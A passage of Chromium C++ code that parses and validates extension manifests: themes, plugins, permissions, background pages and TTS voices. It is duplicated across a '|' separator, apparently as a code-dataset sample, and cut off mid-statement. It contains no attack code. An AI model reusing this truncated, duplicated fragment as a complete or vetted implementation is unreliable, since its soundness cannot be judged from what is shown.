iter != images_value->end_keys(); ++iter) {
std::string val;
if (!images_value->GetString(*iter, &val)) {
*error = errors::kInvalidThemeImages;
return false;
}
}
theme_images_.reset(images_value->DeepCopy());
}
DictionaryValue* colors_value = NULL;
if (theme_value->GetDictionary(keys::kThemeColors, &colors_value)) {
for (DictionaryValue::key_iterator iter = colors_value->begin_keys();
iter != colors_value->end_keys(); ++iter) {
ListValue* color_list = NULL;
double alpha = 0.0;
int color = 0;
if (!colors_value->GetListWithoutPathExpansion(*iter, &color_list) ||
((color_list->GetSize() != 3) &&
((color_list->GetSize() != 4) ||
!color_list->GetDouble(3, &alpha))) ||
!color_list->GetInteger(0, &color) ||
!color_list->GetInteger(1, &color) ||
!color_list->GetInteger(2, &color)) {
*error = errors::kInvalidThemeColors;
return false;
}
}
theme_colors_.reset(colors_value->DeepCopy());
}
DictionaryValue* tints_value = NULL;
if (theme_value->GetDictionary(keys::kThemeTints, &tints_value)) {
for (DictionaryValue::key_iterator iter = tints_value->begin_keys();
iter != tints_value->end_keys(); ++iter) {
ListValue* tint_list = NULL;
double v = 0.0;
if (!tints_value->GetListWithoutPathExpansion(*iter, &tint_list) ||
tint_list->GetSize() != 3 ||
!tint_list->GetDouble(0, &v) ||
!tint_list->GetDouble(1, &v) ||
!tint_list->GetDouble(2, &v)) {
*error = errors::kInvalidThemeTints;
return false;
}
}
theme_tints_.reset(tints_value->DeepCopy());
}
DictionaryValue* display_properties_value = NULL;
if (theme_value->GetDictionary(keys::kThemeDisplayProperties,
&display_properties_value)) {
theme_display_properties_.reset(
display_properties_value->DeepCopy());
}
return true;
}
if (source.HasKey(keys::kPlugins)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kPlugins, &list_value)) {
*error = errors::kInvalidPlugins;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* plugin_value = NULL;
std::string path_str;
bool is_public = false;
if (!list_value->GetDictionary(i, &plugin_value)) {
*error = errors::kInvalidPlugins;
return false;
}
if (!plugin_value->GetString(keys::kPluginsPath, &path_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPluginsPath, base::IntToString(i));
return false;
}
if (plugin_value->HasKey(keys::kPluginsPublic)) {
if (!plugin_value->GetBoolean(keys::kPluginsPublic, &is_public)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPluginsPublic, base::IntToString(i));
return false;
}
}
#if !defined(OS_CHROMEOS)
plugins_.push_back(PluginInfo());
plugins_.back().path = path().AppendASCII(path_str);
plugins_.back().is_public = is_public;
#endif
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kNaClModules)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kNaClModules, &list_value)) {
*error = errors::kInvalidNaClModules;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* module_value = NULL;
std::string path_str;
std::string mime_type;
if (!list_value->GetDictionary(i, &module_value)) {
*error = errors::kInvalidNaClModules;
return false;
}
if (!module_value->GetString(keys::kNaClModulesPath, &path_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidNaClModulesPath, base::IntToString(i));
return false;
}
if (!module_value->GetString(keys::kNaClModulesMIMEType, &mime_type)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidNaClModulesMIMEType, base::IntToString(i));
return false;
}
nacl_modules_.push_back(NaClModuleInfo());
nacl_modules_.back().url = GetResourceURL(path_str);
nacl_modules_.back().mime_type = mime_type;
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kToolstrips)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kToolstrips, &list_value)) {
*error = errors::kInvalidToolstrips;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
GURL toolstrip;
DictionaryValue* toolstrip_value = NULL;
std::string toolstrip_path;
if (list_value->GetString(i, &toolstrip_path)) {
toolstrip = GetResourceURL(toolstrip_path);
} else if (list_value->GetDictionary(i, &toolstrip_value)) {
if (!toolstrip_value->GetString(keys::kToolstripPath,
&toolstrip_path)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidToolstrip, base::IntToString(i));
return false;
}
toolstrip = GetResourceURL(toolstrip_path);
} else {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidToolstrip, base::IntToString(i));
return false;
}
toolstrips_.push_back(toolstrip);
}
}
if (source.HasKey(keys::kContentScripts)) {
ListValue* list_value;
if (!source.GetList(keys::kContentScripts, &list_value)) {
*error = errors::kInvalidContentScriptsList;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* content_script = NULL;
if (!list_value->GetDictionary(i, &content_script)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidContentScript, base::IntToString(i));
return false;
}
UserScript script;
if (!LoadUserScriptHelper(content_script, i, flags, error, &script))
return false; // Failed to parse script context definition.
script.set_extension_id(id());
if (converted_from_user_script_) {
script.set_emulate_greasemonkey(true);
script.set_match_all_frames(true); // Greasemonkey matches all frames.
}
content_scripts_.push_back(script);
}
}
DictionaryValue* page_action_value = NULL;
if (source.HasKey(keys::kPageActions)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kPageActions, &list_value)) {
*error = errors::kInvalidPageActionsList;
return false;
}
size_t list_value_length = list_value->GetSize();
if (list_value_length == 0u) {
} else if (list_value_length == 1u) {
if (!list_value->GetDictionary(0, &page_action_value)) {
*error = errors::kInvalidPageAction;
return false;
}
} else { // list_value_length > 1u.
*error = errors::kInvalidPageActionsListSize;
return false;
}
} else if (source.HasKey(keys::kPageAction)) {
if (!source.GetDictionary(keys::kPageAction, &page_action_value)) {
*error = errors::kInvalidPageAction;
return false;
}
}
if (page_action_value) {
page_action_.reset(
LoadExtensionActionHelper(page_action_value, error));
if (!page_action_.get())
return false; // Failed to parse page action definition.
}
if (source.HasKey(keys::kBrowserAction)) {
DictionaryValue* browser_action_value = NULL;
if (!source.GetDictionary(keys::kBrowserAction, &browser_action_value)) {
*error = errors::kInvalidBrowserAction;
return false;
}
browser_action_.reset(
LoadExtensionActionHelper(browser_action_value, error));
if (!browser_action_.get())
return false; // Failed to parse browser action definition.
}
if (source.HasKey(keys::kFileBrowserHandlers)) {
ListValue* file_browser_handlers_value = NULL;
if (!source.GetList(keys::kFileBrowserHandlers,
&file_browser_handlers_value)) {
*error = errors::kInvalidFileBrowserHandler;
return false;
}
file_browser_handlers_.reset(
LoadFileBrowserHandlers(file_browser_handlers_value, error));
if (!file_browser_handlers_.get())
return false; // Failed to parse file browser actions definition.
}
if (!LoadIsApp(manifest_value_.get(), error) ||
!LoadExtent(manifest_value_.get(), keys::kWebURLs,
&extent_,
errors::kInvalidWebURLs, errors::kInvalidWebURL,
parse_strictness, error) ||
!EnsureNotHybridApp(manifest_value_.get(), error) ||
!LoadLaunchURL(manifest_value_.get(), error) ||
!LoadLaunchContainer(manifest_value_.get(), error) ||
!LoadAppIsolation(manifest_value_.get(), error)) {
return false;
}
if (source.HasKey(keys::kOptionsPage)) {
std::string options_str;
if (!source.GetString(keys::kOptionsPage, &options_str)) {
*error = errors::kInvalidOptionsPage;
return false;
}
if (is_hosted_app()) {
GURL options_url(options_str);
if (!options_url.is_valid() ||
!(options_url.SchemeIs("http") || options_url.SchemeIs("https"))) {
*error = errors::kInvalidOptionsPageInHostedApp;
return false;
}
options_url_ = options_url;
} else {
GURL absolute(options_str);
if (absolute.is_valid()) {
*error = errors::kInvalidOptionsPageExpectUrlInPackage;
return false;
}
options_url_ = GetResourceURL(options_str);
if (!options_url_.is_valid()) {
*error = errors::kInvalidOptionsPage;
return false;
}
}
}
if (source.HasKey(keys::kPermissions)) {
ListValue* permissions = NULL;
if (!source.GetList(keys::kPermissions, &permissions)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermissions, "");
return false;
}
for (size_t i = 0; i < permissions->GetSize(); ++i) {
std::string permission_str;
if (!permissions->GetString(i, &permission_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermission, base::IntToString(i));
return false;
}
if (!IsComponentOnlyPermission(permission_str)
#ifndef NDEBUG
&& !CommandLine::ForCurrentProcess()->HasSwitch(
switches::kExposePrivateExtensionApi)
#endif
) {
continue;
}
if (permission_str == kOldUnlimitedStoragePermission)
permission_str = kUnlimitedStoragePermission;
if (web_extent().is_empty() || location() == Extension::COMPONENT) {
if (IsAPIPermission(permission_str)) {
if (permission_str == Extension::kExperimentalPermission &&
!CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
location() != Extension::COMPONENT) {
*error = errors::kExperimentalFlagRequired;
return false;
}
api_permissions_.insert(permission_str);
continue;
}
} else {
if (IsHostedAppPermission(permission_str)) {
api_permissions_.insert(permission_str);
continue;
}
}
URLPattern pattern = URLPattern(CanExecuteScriptEverywhere() ?
URLPattern::SCHEME_ALL : kValidHostPermissionSchemes);
URLPattern::ParseResult parse_result = pattern.Parse(permission_str,
parse_strictness);
if (parse_result == URLPattern::PARSE_SUCCESS) {
if (!CanSpecifyHostPermission(pattern)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermissionScheme, base::IntToString(i));
return false;
}
pattern.SetPath("/*");
if (pattern.MatchesScheme(chrome::kFileScheme) &&
!CanExecuteScriptEverywhere()) {
wants_file_access_ = true;
if (!(flags & ALLOW_FILE_ACCESS))
pattern.set_valid_schemes(
pattern.valid_schemes() & ~URLPattern::SCHEME_FILE);
}
host_permissions_.push_back(pattern);
}
}
}
if (source.HasKey(keys::kBackground)) {
std::string background_str;
if (!source.GetString(keys::kBackground, &background_str)) {
*error = errors::kInvalidBackground;
return false;
}
if (is_hosted_app()) {
if (api_permissions_.find(kBackgroundPermission) ==
api_permissions_.end()) {
*error = errors::kBackgroundPermissionNeeded;
return false;
}
GURL bg_page(background_str);
if (!bg_page.is_valid()) {
*error = errors::kInvalidBackgroundInHostedApp;
return false;
}
if (!(bg_page.SchemeIs("https") ||
(CommandLine::ForCurrentProcess()->HasSwitch(
switches::kAllowHTTPBackgroundPage) &&
bg_page.SchemeIs("http")))) {
*error = errors::kInvalidBackgroundInHostedApp;
return false;
}
background_url_ = bg_page;
} else {
background_url_ = GetResourceURL(background_str);
}
}
if (source.HasKey(keys::kDefaultLocale)) {
if (!source.GetString(keys::kDefaultLocale, &default_locale_) ||
!l10n_util::IsValidLocaleSyntax(default_locale_)) {
*error = errors::kInvalidDefaultLocale;
return false;
}
}
if (source.HasKey(keys::kChromeURLOverrides)) {
DictionaryValue* overrides = NULL;
if (!source.GetDictionary(keys::kChromeURLOverrides, &overrides)) {
*error = errors::kInvalidChromeURLOverrides;
return false;
}
for (DictionaryValue::key_iterator iter = overrides->begin_keys();
iter != overrides->end_keys(); ++iter) {
std::string page = *iter;
std::string val;
if ((page != chrome::kChromeUINewTabHost &&
#if defined(TOUCH_UI)
page != chrome::kChromeUIKeyboardHost &&
#endif
#if defined(OS_CHROMEOS)
page != chrome::kChromeUIActivationMessageHost &&
#endif
page != chrome::kChromeUIBookmarksHost &&
page != chrome::kChromeUIHistoryHost) ||
!overrides->GetStringWithoutPathExpansion(*iter, &val)) {
*error = errors::kInvalidChromeURLOverrides;
return false;
}
chrome_url_overrides_[page] = GetResourceURL(val);
}
if (overrides->size() > 1) {
*error = errors::kMultipleOverrides;
return false;
}
}
if (source.HasKey(keys::kOmnibox)) {
if (!source.GetString(keys::kOmniboxKeyword, &omnibox_keyword_) ||
omnibox_keyword_.empty()) {
*error = errors::kInvalidOmniboxKeyword;
return false;
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kContentSecurityPolicy)) {
std::string content_security_policy;
if (!source.GetString(keys::kContentSecurityPolicy,
&content_security_policy)) {
*error = errors::kInvalidContentSecurityPolicy;
return false;
}
const char kBadCSPCharacters[] = {'\r', '\n', '\0'};
if (content_security_policy.find_first_of(kBadCSPCharacters, 0,
arraysize(kBadCSPCharacters)) !=
std::string::npos) {
*error = errors::kInvalidContentSecurityPolicy;
return false;
}
content_security_policy_ = content_security_policy;
}
if (source.HasKey(keys::kDevToolsPage)) {
std::string devtools_str;
if (!source.GetString(keys::kDevToolsPage, &devtools_str)) {
*error = errors::kInvalidDevToolsPage;
return false;
}
if (!HasApiPermission(Extension::kExperimentalPermission)) {
*error = errors::kDevToolsExperimental;
return false;
}
devtools_url_ = GetResourceURL(devtools_str);
}
if (source.HasKey(keys::kSidebar)) {
DictionaryValue* sidebar_value = NULL;
if (!source.GetDictionary(keys::kSidebar, &sidebar_value)) {
*error = errors::kInvalidSidebar;
return false;
}
if (!HasApiPermission(Extension::kExperimentalPermission)) {
*error = errors::kSidebarExperimental;
return false;
}
sidebar_defaults_.reset(LoadExtensionSidebarDefaults(sidebar_value, error));
if (!sidebar_defaults_.get())
return false; // Failed to parse sidebar definition.
}
if (source.HasKey(keys::kTts)) {
DictionaryValue* tts_dict = NULL;
if (!source.GetDictionary(keys::kTts, &tts_dict)) {
*error = errors::kInvalidTts;
return false;
}
if (tts_dict->HasKey(keys::kTtsVoices)) {
ListValue* tts_voices = NULL;
if (!tts_dict->GetList(keys::kTtsVoices, &tts_voices)) {
*error = errors::kInvalidTtsVoices;
return false;
}
for (size_t i = 0; i < tts_voices->GetSize(); i++) {
DictionaryValue* one_tts_voice = NULL;
if (!tts_voices->GetDictionary(i, &one_tts_voice)) {
*error = errors::kInvalidTtsVoices;
return false;
}
TtsVoice voice_data;
if (one_tts_voice->HasKey(keys::kTtsVoicesVoiceName)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesVoiceName, &voice_data.voice_name)) {
*error = errors::kInvalidTtsVoicesVoiceName;
return false;
}
}
if (one_tts_voice->HasKey(keys::kTtsVoicesLocale)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesLocale, &voice_data.locale) ||
!l10n_util::IsValidLocaleSyntax(voice_data.locale)) {
*error = errors::kInvalidTtsVoicesLocale;
return false;
}
}
if (one_tts_voice->HasKey(keys::kTtsVoicesGender)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesGender, &voice_data.gender) ||
(voice_data.gender != keys::kTtsGenderMale &&
voice_data.gender != keys::kTtsGenderFemale)) {
*error = errors::kInvalidTtsVoicesGender;
return false;
}
}
tts_voices_.push_back(voice_data);
}
}
}
incognito_split_mode_ = is_app();
if (source.HasKey(keys::kIncognito)) {
std::string value;
if (!source.GetString(keys::kIncognito, &value)) {
*error = errors::kInvalidIncognitoBehavior;
return false;
}
if (value == values::kIncognitoSpanning) {
incognito_split_mode_ = false;
} else if (value == values::kIncognitoSplit) {
incognito_split_mode_ = true;
} else {
*error = errors::kInvalidIncognitoBehavior;
return false;
}
}
if (HasMultipleUISurfaces()) {
*error = errors::kOneUISurfaceOnly;
return false;
}
InitEffectiveHostPermissions();
DCHECK(source.Equals(manifest_value_.get()));
return true;
}
|
bool Extension::InitFromValue(const DictionaryValue& source, int flags,
std::string* error) {
URLPattern::ParseOption parse_strictness =
(flags & STRICT_ERROR_CHECKS ? URLPattern::PARSE_STRICT
: URLPattern::PARSE_LENIENT);
if (source.HasKey(keys::kPublicKey)) {
std::string public_key_bytes;
if (!source.GetString(keys::kPublicKey,
&public_key_) ||
!ParsePEMKeyBytes(public_key_,
&public_key_bytes) ||
!GenerateId(public_key_bytes, &id_)) {
*error = errors::kInvalidKey;
return false;
}
} else if (flags & REQUIRE_KEY) {
*error = errors::kInvalidKey;
return false;
} else {
id_ = Extension::GenerateIdForPath(path());
if (id_.empty()) {
NOTREACHED() << "Could not create ID from path.";
return false;
}
}
manifest_value_.reset(source.DeepCopy());
extension_url_ = Extension::GetBaseURLFromExtensionId(id());
std::string version_str;
if (!source.GetString(keys::kVersion, &version_str)) {
*error = errors::kInvalidVersion;
return false;
}
version_.reset(Version::GetVersionFromString(version_str));
if (!version_.get() ||
version_->components().size() > 4) {
*error = errors::kInvalidVersion;
return false;
}
string16 localized_name;
if (!source.GetString(keys::kName, &localized_name)) {
*error = errors::kInvalidName;
return false;
}
base::i18n::AdjustStringForLocaleDirection(&localized_name);
name_ = UTF16ToUTF8(localized_name);
if (source.HasKey(keys::kDescription)) {
if (!source.GetString(keys::kDescription,
&description_)) {
*error = errors::kInvalidDescription;
return false;
}
}
if (source.HasKey(keys::kHomepageURL)) {
std::string tmp;
if (!source.GetString(keys::kHomepageURL, &tmp)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidHomepageURL, "");
return false;
}
homepage_url_ = GURL(tmp);
if (!homepage_url_.is_valid()) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidHomepageURL, tmp);
return false;
}
}
if (source.HasKey(keys::kUpdateURL)) {
std::string tmp;
if (!source.GetString(keys::kUpdateURL, &tmp)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidUpdateURL, "");
return false;
}
update_url_ = GURL(tmp);
if (!update_url_.is_valid() ||
update_url_.has_ref()) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidUpdateURL, tmp);
return false;
}
}
if (source.HasKey(keys::kMinimumChromeVersion)) {
std::string minimum_version_string;
if (!source.GetString(keys::kMinimumChromeVersion,
&minimum_version_string)) {
*error = errors::kInvalidMinimumChromeVersion;
return false;
}
scoped_ptr<Version> minimum_version(
Version::GetVersionFromString(minimum_version_string));
if (!minimum_version.get()) {
*error = errors::kInvalidMinimumChromeVersion;
return false;
}
chrome::VersionInfo current_version_info;
if (!current_version_info.is_valid()) {
NOTREACHED();
return false;
}
scoped_ptr<Version> current_version(
Version::GetVersionFromString(current_version_info.Version()));
if (!current_version.get()) {
DCHECK(false);
return false;
}
if (current_version->CompareTo(*minimum_version) < 0) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kChromeVersionTooLow,
l10n_util::GetStringUTF8(IDS_PRODUCT_NAME),
minimum_version_string);
return false;
}
}
source.GetBoolean(keys::kConvertedFromUserScript,
&converted_from_user_script_);
if (source.HasKey(keys::kIcons)) {
DictionaryValue* icons_value = NULL;
if (!source.GetDictionary(keys::kIcons, &icons_value)) {
*error = errors::kInvalidIcons;
return false;
}
for (size_t i = 0; i < arraysize(kIconSizes); ++i) {
std::string key = base::IntToString(kIconSizes[i]);
if (icons_value->HasKey(key)) {
std::string icon_path;
if (!icons_value->GetString(key, &icon_path)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidIconPath, key);
return false;
}
if (!icon_path.empty() && icon_path[0] == '/')
icon_path = icon_path.substr(1);
if (icon_path.empty()) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidIconPath, key);
return false;
}
icons_.Add(kIconSizes[i], icon_path);
}
}
}
is_theme_ = false;
if (source.HasKey(keys::kTheme)) {
if (ContainsNonThemeKeys(source)) {
*error = errors::kThemesCannotContainExtensions;
return false;
}
DictionaryValue* theme_value = NULL;
if (!source.GetDictionary(keys::kTheme, &theme_value)) {
*error = errors::kInvalidTheme;
return false;
}
is_theme_ = true;
DictionaryValue* images_value = NULL;
if (theme_value->GetDictionary(keys::kThemeImages, &images_value)) {
for (DictionaryValue::key_iterator iter = images_value->begin_keys();
iter != images_value->end_keys(); ++iter) {
std::string val;
if (!images_value->GetString(*iter, &val)) {
*error = errors::kInvalidThemeImages;
return false;
}
}
theme_images_.reset(images_value->DeepCopy());
}
DictionaryValue* colors_value = NULL;
if (theme_value->GetDictionary(keys::kThemeColors, &colors_value)) {
for (DictionaryValue::key_iterator iter = colors_value->begin_keys();
iter != colors_value->end_keys(); ++iter) {
ListValue* color_list = NULL;
double alpha = 0.0;
int color = 0;
if (!colors_value->GetListWithoutPathExpansion(*iter, &color_list) ||
((color_list->GetSize() != 3) &&
((color_list->GetSize() != 4) ||
!color_list->GetDouble(3, &alpha))) ||
!color_list->GetInteger(0, &color) ||
!color_list->GetInteger(1, &color) ||
!color_list->GetInteger(2, &color)) {
*error = errors::kInvalidThemeColors;
return false;
}
}
theme_colors_.reset(colors_value->DeepCopy());
}
DictionaryValue* tints_value = NULL;
if (theme_value->GetDictionary(keys::kThemeTints, &tints_value)) {
for (DictionaryValue::key_iterator iter = tints_value->begin_keys();
iter != tints_value->end_keys(); ++iter) {
ListValue* tint_list = NULL;
double v = 0.0;
if (!tints_value->GetListWithoutPathExpansion(*iter, &tint_list) ||
tint_list->GetSize() != 3 ||
!tint_list->GetDouble(0, &v) ||
!tint_list->GetDouble(1, &v) ||
!tint_list->GetDouble(2, &v)) {
*error = errors::kInvalidThemeTints;
return false;
}
}
theme_tints_.reset(tints_value->DeepCopy());
}
DictionaryValue* display_properties_value = NULL;
if (theme_value->GetDictionary(keys::kThemeDisplayProperties,
&display_properties_value)) {
theme_display_properties_.reset(
display_properties_value->DeepCopy());
}
return true;
}
if (source.HasKey(keys::kPlugins)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kPlugins, &list_value)) {
*error = errors::kInvalidPlugins;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* plugin_value = NULL;
std::string path_str;
bool is_public = false;
if (!list_value->GetDictionary(i, &plugin_value)) {
*error = errors::kInvalidPlugins;
return false;
}
if (!plugin_value->GetString(keys::kPluginsPath, &path_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPluginsPath, base::IntToString(i));
return false;
}
if (plugin_value->HasKey(keys::kPluginsPublic)) {
if (!plugin_value->GetBoolean(keys::kPluginsPublic, &is_public)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPluginsPublic, base::IntToString(i));
return false;
}
}
#if !defined(OS_CHROMEOS)
plugins_.push_back(PluginInfo());
plugins_.back().path = path().AppendASCII(path_str);
plugins_.back().is_public = is_public;
#endif
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kNaClModules)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kNaClModules, &list_value)) {
*error = errors::kInvalidNaClModules;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* module_value = NULL;
std::string path_str;
std::string mime_type;
if (!list_value->GetDictionary(i, &module_value)) {
*error = errors::kInvalidNaClModules;
return false;
}
if (!module_value->GetString(keys::kNaClModulesPath, &path_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidNaClModulesPath, base::IntToString(i));
return false;
}
if (!module_value->GetString(keys::kNaClModulesMIMEType, &mime_type)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidNaClModulesMIMEType, base::IntToString(i));
return false;
}
nacl_modules_.push_back(NaClModuleInfo());
nacl_modules_.back().url = GetResourceURL(path_str);
nacl_modules_.back().mime_type = mime_type;
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kToolstrips)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kToolstrips, &list_value)) {
*error = errors::kInvalidToolstrips;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
GURL toolstrip;
DictionaryValue* toolstrip_value = NULL;
std::string toolstrip_path;
if (list_value->GetString(i, &toolstrip_path)) {
toolstrip = GetResourceURL(toolstrip_path);
} else if (list_value->GetDictionary(i, &toolstrip_value)) {
if (!toolstrip_value->GetString(keys::kToolstripPath,
&toolstrip_path)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidToolstrip, base::IntToString(i));
return false;
}
toolstrip = GetResourceURL(toolstrip_path);
} else {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidToolstrip, base::IntToString(i));
return false;
}
toolstrips_.push_back(toolstrip);
}
}
if (source.HasKey(keys::kContentScripts)) {
ListValue* list_value;
if (!source.GetList(keys::kContentScripts, &list_value)) {
*error = errors::kInvalidContentScriptsList;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* content_script = NULL;
if (!list_value->GetDictionary(i, &content_script)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidContentScript, base::IntToString(i));
return false;
}
UserScript script;
if (!LoadUserScriptHelper(content_script, i, flags, error, &script))
return false; // Failed to parse script context definition.
script.set_extension_id(id());
if (converted_from_user_script_) {
script.set_emulate_greasemonkey(true);
script.set_match_all_frames(true); // Greasemonkey matches all frames.
}
content_scripts_.push_back(script);
}
}
DictionaryValue* page_action_value = NULL;
if (source.HasKey(keys::kPageActions)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kPageActions, &list_value)) {
*error = errors::kInvalidPageActionsList;
return false;
}
size_t list_value_length = list_value->GetSize();
if (list_value_length == 0u) {
} else if (list_value_length == 1u) {
if (!list_value->GetDictionary(0, &page_action_value)) {
*error = errors::kInvalidPageAction;
return false;
}
} else { // list_value_length > 1u.
*error = errors::kInvalidPageActionsListSize;
return false;
}
} else if (source.HasKey(keys::kPageAction)) {
if (!source.GetDictionary(keys::kPageAction, &page_action_value)) {
*error = errors::kInvalidPageAction;
return false;
}
}
if (page_action_value) {
page_action_.reset(
LoadExtensionActionHelper(page_action_value, error));
if (!page_action_.get())
return false; // Failed to parse page action definition.
}
if (source.HasKey(keys::kBrowserAction)) {
DictionaryValue* browser_action_value = NULL;
if (!source.GetDictionary(keys::kBrowserAction, &browser_action_value)) {
*error = errors::kInvalidBrowserAction;
return false;
}
browser_action_.reset(
LoadExtensionActionHelper(browser_action_value, error));
if (!browser_action_.get())
return false; // Failed to parse browser action definition.
}
if (source.HasKey(keys::kFileBrowserHandlers)) {
ListValue* file_browser_handlers_value = NULL;
if (!source.GetList(keys::kFileBrowserHandlers,
&file_browser_handlers_value)) {
*error = errors::kInvalidFileBrowserHandler;
return false;
}
file_browser_handlers_.reset(
LoadFileBrowserHandlers(file_browser_handlers_value, error));
if (!file_browser_handlers_.get())
return false; // Failed to parse file browser actions definition.
}
if (!LoadIsApp(manifest_value_.get(), error) ||
!LoadExtent(manifest_value_.get(), keys::kWebURLs,
&extent_,
errors::kInvalidWebURLs, errors::kInvalidWebURL,
parse_strictness, error) ||
!EnsureNotHybridApp(manifest_value_.get(), error) ||
!LoadLaunchURL(manifest_value_.get(), error) ||
!LoadLaunchContainer(manifest_value_.get(), error) ||
!LoadAppIsolation(manifest_value_.get(), error)) {
return false;
}
if (source.HasKey(keys::kOptionsPage)) {
std::string options_str;
if (!source.GetString(keys::kOptionsPage, &options_str)) {
*error = errors::kInvalidOptionsPage;
return false;
}
if (is_hosted_app()) {
GURL options_url(options_str);
if (!options_url.is_valid() ||
!(options_url.SchemeIs("http") || options_url.SchemeIs("https"))) {
*error = errors::kInvalidOptionsPageInHostedApp;
return false;
}
options_url_ = options_url;
} else {
GURL absolute(options_str);
if (absolute.is_valid()) {
*error = errors::kInvalidOptionsPageExpectUrlInPackage;
return false;
}
options_url_ = GetResourceURL(options_str);
if (!options_url_.is_valid()) {
*error = errors::kInvalidOptionsPage;
return false;
}
}
}
if (source.HasKey(keys::kPermissions)) {
ListValue* permissions = NULL;
if (!source.GetList(keys::kPermissions, &permissions)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermissions, "");
return false;
}
for (size_t i = 0; i < permissions->GetSize(); ++i) {
std::string permission_str;
if (!permissions->GetString(i, &permission_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermission, base::IntToString(i));
return false;
}
if (!IsComponentOnlyPermission(permission_str)
#ifndef NDEBUG
&& !CommandLine::ForCurrentProcess()->HasSwitch(
switches::kExposePrivateExtensionApi)
#endif
) {
continue;
}
if (permission_str == kOldUnlimitedStoragePermission)
permission_str = kUnlimitedStoragePermission;
if (web_extent().is_empty() || location() == Extension::COMPONENT) {
if (IsAPIPermission(permission_str)) {
if (permission_str == Extension::kExperimentalPermission &&
!CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
location() != Extension::COMPONENT) {
*error = errors::kExperimentalFlagRequired;
return false;
}
api_permissions_.insert(permission_str);
continue;
}
} else {
if (IsHostedAppPermission(permission_str)) {
api_permissions_.insert(permission_str);
continue;
}
}
URLPattern pattern = URLPattern(CanExecuteScriptEverywhere() ?
URLPattern::SCHEME_ALL : kValidHostPermissionSchemes);
URLPattern::ParseResult parse_result = pattern.Parse(permission_str,
parse_strictness);
if (parse_result == URLPattern::PARSE_SUCCESS) {
if (!CanSpecifyHostPermission(pattern)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermissionScheme, base::IntToString(i));
return false;
}
pattern.SetPath("/*");
if (pattern.MatchesScheme(chrome::kFileScheme) &&
!CanExecuteScriptEverywhere()) {
wants_file_access_ = true;
if (!(flags & ALLOW_FILE_ACCESS))
pattern.set_valid_schemes(
pattern.valid_schemes() & ~URLPattern::SCHEME_FILE);
}
host_permissions_.push_back(pattern);
}
}
}
if (source.HasKey(keys::kBackground)) {
std::string background_str;
if (!source.GetString(keys::kBackground, &background_str)) {
*error = errors::kInvalidBackground;
return false;
}
if (is_hosted_app()) {
if (api_permissions_.find(kBackgroundPermission) ==
api_permissions_.end()) {
*error = errors::kBackgroundPermissionNeeded;
return false;
}
GURL bg_page(background_str);
if (!bg_page.is_valid()) {
*error = errors::kInvalidBackgroundInHostedApp;
return false;
}
if (!(bg_page.SchemeIs("https") ||
(CommandLine::ForCurrentProcess()->HasSwitch(
switches::kAllowHTTPBackgroundPage) &&
